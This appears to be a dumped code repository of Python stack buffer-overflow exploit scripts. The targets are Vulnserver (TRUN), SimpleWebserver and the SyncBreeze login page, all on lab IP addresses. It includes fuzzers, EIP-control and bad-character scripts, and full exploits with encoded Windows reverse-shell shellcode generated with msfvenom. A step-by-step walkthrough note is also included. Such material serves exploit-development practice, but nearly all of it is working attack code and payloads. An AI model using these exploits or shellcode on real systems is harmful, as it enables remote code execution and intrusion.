"\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 26 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 27 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 28 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 29 | "\x09\x98\x82\x4d\x29\x89") 30 | 31 | 32 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 33 | 34 | try: 35 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 36 | s.connect(('192.168.1.133',9999)) 37 | print("Sending pattern to Remote server....." ) 38 | s.send(('TRUN /.:/'+ Shellcode)) 39 | s.close() 40 | 41 | except: 42 | print("Error in connecting") 43 | sys.exit() 44 | -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/bad_char: -------------------------------------------------------------------------------- 1 | //List of bad characters 2 | 3 | 4 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | Shellcode="A" * 2003 +"B" * 4 + badchars 14 | 15 | 16 | try: 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | s.connect(('192.168.1.133',9999)) 19 | print("Sending pattern to Remote server....." ) 20 | s.send(('TRUN /.:/'+ Shellcode)) 21 | s.close() 22 | 23 | except: 24 | print("Error in connecting") 25 | sys.exit() 26 | -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/bad_chat.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | 3 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 4 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 5 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 6 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 7 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 8 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 9 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 10 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 11 | 12 | buffer ="A" * 524 + "B" *4 + badchars 13 | 14 | try: 15 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 16 | s.connect(('192.168.0.134',9999)) 17 | print "Sending Exploit to remote system......." 18 | s.send((buffer)) 19 | s.recv(1024) 20 | s.close() 21 | 22 | 23 | 24 | except: 25 | print("Unable to connect to remote server ......") 26 | -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/bc_len.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 4 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 5 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 6 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 7 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 8 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 9 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 10 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 11 | 12 | print ("Length %s by" % str(len(badchars)) -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send(('TRUN /.:/'+ buffer)) 12 | s.close() 13 | sleep(1) 14 | buffer=buffer + "A"*100 15 | 16 | 17 | except: 18 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 19 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/return_add.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/Script/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 2003 +"B" * 4 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/Script/Eip_controlsd.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | 5 | Shellcode="A" * 1788 + "B" * 4 6 | eob="HTTP/1.1\r\n\r\n" 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',80)) 10 | print("Sending pattern to Remote server" ) 11 | s.send(('GET'+ Shellcode + eob)) 12 | print s.recv(1024) 13 | print "\nDone!." 14 | s.close() 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() 19 | -------------------------------------------------------------------------------- /BufferOverflow/Script/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | import struct 4 | 5 | "Ret address=>625011AF" 6 | 7 | exploit=("\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 8 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 9 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 10 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 11 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 12 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 13 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 14 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 15 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 16 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 17 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 18 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 19 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 20 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 21 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 22 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 23 | "\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 24 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 25 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 26 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 27 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 28 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 29 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 30 | "\x09\x98\x82\x4d\x29\x89") 31 | 32 | jmpesp=struct.pack("625011AF" 5 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/SimpleWebserver/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | 5 | import socket 6 | import sys 7 | 8 | 9 | junk = "A" * 1284 +"B" * 4 + "C" * 1200 10 | 11 | 12 | 13 | req = "GET / HTTP/1.1\r\n" 14 | req += "Host: 192.168.0.134\r\n" 15 | req += "Connection:" + junk + "B" *4 +"\r\n" 16 | req += "\r\n" 17 | 18 | 19 | try: 20 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 21 | s.connect(('192.168.0.134',80)) 22 | print "Sendin Payload......" 23 | s.send(req) 24 | s.recv(1024) 25 | s.close() 26 | 27 | except: 28 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 29 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/SimpleWebserver/Shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | 5 | import socket 6 | import sys 7 | 8 | 9 | #msfvenom -p windows/shell_reverse_tcp LHOS=192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x00\x09\x0a" 10 | 11 | Shellcode=("\xda\xd0\xd9\x74\x24\xf4\xba\x8f\xe1\xbb\xbe\x5e\x29\xc9\xb1" 12 | "\x52\x31\x56\x17\x83\xc6\x04\x03\xd9\xf2\x59\x4b\x19\x1c\x1f" 13 | "\xb4\xe1\xdd\x40\x3c\x04\xec\x40\x5a\x4d\x5f\x71\x28\x03\x6c" 14 | "\xfa\x7c\xb7\xe7\x8e\xa8\xb8\x40\x24\x8f\xf7\x51\x15\xf3\x96" 15 | "\xd1\x64\x20\x78\xeb\xa6\x35\x79\x2c\xda\xb4\x2b\xe5\x90\x6b" 16 | "\xdb\x82\xed\xb7\x50\xd8\xe0\xbf\x85\xa9\x03\x91\x18\xa1\x5d" 17 | "\x31\x9b\x66\xd6\x78\x83\x6b\xd3\x33\x38\x5f\xaf\xc5\xe8\x91" 18 | "\x50\x69\xd5\x1d\xa3\x73\x12\x99\x5c\x06\x6a\xd9\xe1\x11\xa9" 19 | "\xa3\x3d\x97\x29\x03\xb5\x0f\x95\xb5\x1a\xc9\x5e\xb9\xd7\x9d" 20 | "\x38\xde\xe6\x72\x33\xda\x63\x75\x93\x6a\x37\x52\x37\x36\xe3" 21 | "\xfb\x6e\x92\x42\x03\x70\x7d\x3a\xa1\xfb\x90\x2f\xd8\xa6\xfc" 22 | "\x9c\xd1\x58\xfd\x8a\x62\x2b\xcf\x15\xd9\xa3\x63\xdd\xc7\x34" 23 | "\x83\xf4\xb0\xaa\x7a\xf7\xc0\xe3\xb8\xa3\x90\x9b\x69\xcc\x7a" 24 | "\x5b\x95\x19\x2c\x0b\x39\xf2\x8d\xfb\xf9\xa2\x65\x11\xf6\x9d" 25 | "\x96\x1a\xdc\xb5\x3d\xe1\xb7\x79\x69\xe9\xc0\x12\x68\xe9\xca" 26 | "\x30\xe5\x0f\xb8\xa4\xa0\x98\x55\x5c\xe9\x52\xc7\xa1\x27\x1f" 27 | "\xc7\x2a\xc4\xe0\x86\xda\xa1\xf2\x7f\x2b\xfc\xa8\xd6\x34\x2a" 28 | "\xc4\xb5\xa7\xb1\x14\xb3\xdb\x6d\x43\x94\x2a\x64\x01\x08\x14" 29 | "\xde\x37\xd1\xc0\x19\xf3\x0e\x31\xa7\xfa\xc3\x0d\x83\xec\x1d" 30 | "\x8d\x8f\x58\xf2\xd8\x59\x36\xb4\xb2\x2b\xe0\x6e\x68\xe2\x64" 31 | "\xf6\x42\x35\xf2\xf7\x8e\xc3\x1a\x49\x67\x92\x25\x66\xef\x12" 32 | "\x5e\x9a\x8f\xdd\xb5\x1e\xaf\x3f\x1f\x6b\x58\xe6\xca\xd6\x05" 33 | "\x19\x21\x14\x30\x9a\xc3\xe5\xc7\x82\xa6\xe0\x8c\x04\x5b\x99" 34 | "\x9d\xe0\x5b\x0e\x9d\x20") 35 | 36 | 37 | 38 | junk = "A" * 4992 +"B" * 4 + "\x90" * 30 + Shellcode + "C" *4 39 | 40 | 41 | 42 | req = "GET / HTTP/1.1\r\n" 43 | req += "Host: 192.168.0.134\r\n" 44 | req += "Connection:" + junk + "B" *4 +"\r\n" 45 | req += "\r\n" 46 | 47 | 48 | try: 49 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 50 | s.connect(('192.168.0.134',80)) 51 | print "Sendin Payload......" 52 | s.send(req) 53 | s.recv(1024) 54 | s.close() 55 | 56 | except: 57 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 58 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/SimpleWebserver/Walk: -------------------------------------------------------------------------------- 1 | SImpleWebserver 2 | 3 | IP : 192.168.0.134 4 | port 80 5 | _____________________________ 6 | 7 | 1. crash at 5000 8 | 2. pattern EIP=> 79433179 9 | 3. Offset => 2284 10 | 4. Control EIP "A"*2284 +"B" *4 + "C" *500 11 | 5. Finding Bad char ="\x00\x09\x0a" 12 | 6. JMP ESP "FFE4" 13 | 8. Control return add 14 | 9. shellcode =>msfvenom -p Windows/shell_reverse_tcp LHOS=192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x00\x09\x0a" 15 | 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /BufferOverflow/SimpleWebserver/badchar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | 5 | import socket 6 | import sys 7 | 8 | 9 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x80\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 10 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 11 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 12 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 13 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 14 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 15 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 16 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 17 | 18 | junk = "A" * 1800 +"B" * 4 + badchars + "C" *200 19 | 20 | 21 | 22 | req = "GET / HTTP/1.1\r\n" 23 | req += "Host: 192.168.0.134\r\n" 24 | req += "Connection:" + junk + "B" *4 +"\r\n" 25 | req += "\r\n" 26 | 27 | 28 | try: 29 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 30 | s.connect(('192.168.0.134',80)) 31 | print "Sendin Payload......" 32 | s.send(req) 33 | s.recv(1024) 34 | s.close() 35 | 36 | except: 37 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 38 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/SimpleWebserver/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | 5 | import socket 6 | import sys 7 | 8 | 9 | junk = "A"*5000 10 | 11 | 12 | 13 | req = "GET / HTTP/1.1\r\n" 14 | req += "Host: 192.168.0.134\r\n" 15 | req += "Connection:" + junk + "\r\n" 16 | req += "\r\n" 17 | 18 | 19 | try: 20 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 21 | s.connect(('192.168.0.134',80)) 22 | print "Sendin Payload......" 23 | s.send(req) 24 | s.recv(1024) 25 | s.close() 26 | 27 | except: 28 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 29 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/Bad_cahr.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | badchars = ( 7 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10" 8 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 9 | "\x21\x22\x23\x24\x27\x28\x29\x2a\x2c\x2d\x2e\x2f\x30" 10 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3e\x3f\x40" 11 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 12 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 13 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 14 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 15 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 16 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 17 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 18 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 19 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 20 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 21 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 22 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 23 | ) 24 | crash = "A" * 780 + "B" * 4 25 | crash += badchars 26 | 27 | fuzz="username="+crash+"&password=A" 28 | 29 | buffer="POST /login HTTP/1.1\r\n" 30 | buffer+="Host: 192.1.0.134\r\n" 31 | buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n" 32 | buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 33 | buffer+="Accept-Language: en-US,en;q=0.5\r\n" 34 | buffer+="Referer: http://192.168.0.134/login\r\n" 35 | buffer+="Connection: close\r\n" 36 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 37 | buffer+="Content-Length: "+str(len(fuzz))+"\r\n" 38 | buffer+="\r\n" 39 | buffer+=fuzz 40 | 41 | expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 42 | expl.connect(("192.168.0.134", 80)) 43 | expl.send(buffer) 44 | expl.close() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/EIP_control.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | crash = "A" * 780 + "V" * 4 7 | crash += "C" * (100-len(crash)) 8 | 9 | fuzz="username="+crash+"&password=A" 10 | 11 | buffer="POST /login HTTP/1.1\r\n" 12 | buffer+="Host: 192.1.0.134\r\n" 13 | buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n" 14 | buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 15 | buffer+="Accept-Language: en-US,en;q=0.5\r\n" 16 | buffer+="Referer: http://192.168.0.134/login\r\n" 17 | buffer+="Connection: close\r\n" 18 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 19 | buffer+="Content-Length: "+str(len(fuzz))+"\r\n" 20 | buffer+="\r\n" 21 | buffer+=fuzz 22 | 23 | expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 24 | expl.connect(("192.168.0.134", 80)) 25 | expl.send(buffer) 26 | expl.close() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/Fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | crash = "A" * 1100 7 | 8 | fuzz="username="+crash+"&password=A" 9 | 10 | buffer="POST /login HTTP/1.1\r\n" 11 | buffer+="Host: 192.1.0.134\r\n" 12 | buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n" 13 | buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 14 | buffer+="Accept-Language: en-US,en;q=0.5\r\n" 15 | buffer+="Referer: http://192.168.0.134/login\r\n" 16 | buffer+="Connection: close\r\n" 17 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 18 | buffer+="Content-Length: "+str(len(fuzz))+"\r\n" 19 | buffer+="\r\n" 20 | buffer+=fuzz 21 | 22 | expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 23 | expl.connect(("192.168.0.134", 80)) 24 | expl.send(buffer) 